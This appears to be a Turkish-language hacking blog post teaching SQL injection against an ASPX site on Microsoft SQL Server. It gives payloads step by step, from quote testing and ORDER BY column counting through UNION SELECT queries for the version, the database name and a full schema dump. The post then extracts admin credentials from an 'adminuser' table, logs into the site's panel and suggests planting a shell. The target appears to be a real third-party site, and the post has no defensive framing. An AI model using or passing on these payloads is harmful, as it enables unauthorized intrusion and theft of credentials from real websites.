Bu Konuda ASPX Siteye üzerinde Sql İnjection İşlemi yapmayı öğreneceğiz.
Öncelikle Sql Açıklı aspx sitemizi açtık;
Tek Tırnak Atalım Bakalım Hata Alacakmıyız ?
Evet hata aldık.
Kolon Sayısı bulmaya geçelim.
order by 8-- - Dedik Sayfa yine aynı;
order by 9-- - diyelim bakalım değişim olacak mı ?
The ORDER BY position number 9 is out of range of the number of items in the select list. 9‘da bu hatayı aldık Bu hatayı aldık demek ki kolon sayımız 9‘dan az.
Her zaman hata aldığımız sayıdan önceki sayı kolon sayısıdır. Örnek:Biz 9‘da hata aldık kolon sayımız 8
+UNION+ALL+SELECT+1,2,3,4,5,6,7,8-- -
Evet iyi gidiyor bulunduğumuz sayfadaki fotoğrafın adıyla ilgili birşey çıktı.
bu iyiye gittiğine işaret.
Version öğrenmek istiyorum.
+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8-- - dedim
Olumsuz sonuç aldım;
null ile deniyelim.
Hackbar gt;Union Statement gt;NULL,NULL Seçeneğini seçtik.
bizden sayı isteyecek kolon sayımız olan 8‘i gireceğiz.
oluşturduğu url‘den olumlu sonuç çıkmayabilir null‘ları sırayla tek tek silerek deneyebilirsiniz.
UNION+ALL+SELECT+@@version,null,null,null,null,null,null,null--+- dedim.
Versiyon bilgisi bizde;
Conversion failed when converting the nvarchar value ‘Microsoft SQL Server 2012 - 11.0.5058.0 (X64)
May 14 2014 18:34:29
Copyright (c) Microsoft Corporation
Express Edition (64-bit) on Windows NT 6.3 lt;X64 gt; (Build 9600: ) (Hypervisor)
‘ to data type int.
Sıra Geldi Database Adı Almaya;
+UNION+ALL+SELECT+db_name(),null,null,null,null,null,null,null--+- dedik.
ve Database adımızı aldık.
Database Adı;
clienthostin_Dixon
En karışık gibi görünen ama basit bir kısıma geldik
Union Based Seçeneğini Seçtik ve Dios Mssql dedik.
Dedikten sonra url sonuna uzunca bir kod ekledi
urlde küçük bir değişiklik yapacağız.
url sonundaki output into Chall1 END-- ‘i output into cw1 END-- - olarak değiştireceğiz.
ve üstteki ‘injected by rummykhan metnini injected by cw1 olarak değiştireceğiz.
ve komutu gireceğiz karşımıza kayda değer birşey çıkmayacak çünkü bu girdiğimiz komutun karşılığını diğer gireceğimiz komutta alacağız.
Kolonları ve içerikleri önümüze dökelim;
+UNION+ALL+SELECT+output,null,null,null,null,null,null,null from cw1 --+- dedik.
ve sonuç;
Tablo adları ve kolonları kolon adları vs gözüküyor.
Bizim işimize yarayacak olan Tablo‘nun adı adminuser kolonları da username ve passwords.
Evet İnjection İşlemimizdeki Son Aşamaya geldik.
UNION+ALL+SELECT+concat(username,0x3a,passwords),null,null,null,null,null,null,null from adminuser--+- dedik ve Admin bilgileri karşımızda.
Username:admin
Password:admins
Şimdi Panele girmeyi deneyelim;
Ve Paneldeyiz Artık İstediğimizi yapabiliriz ister shell vs atabiliriz.
Yorum Gönder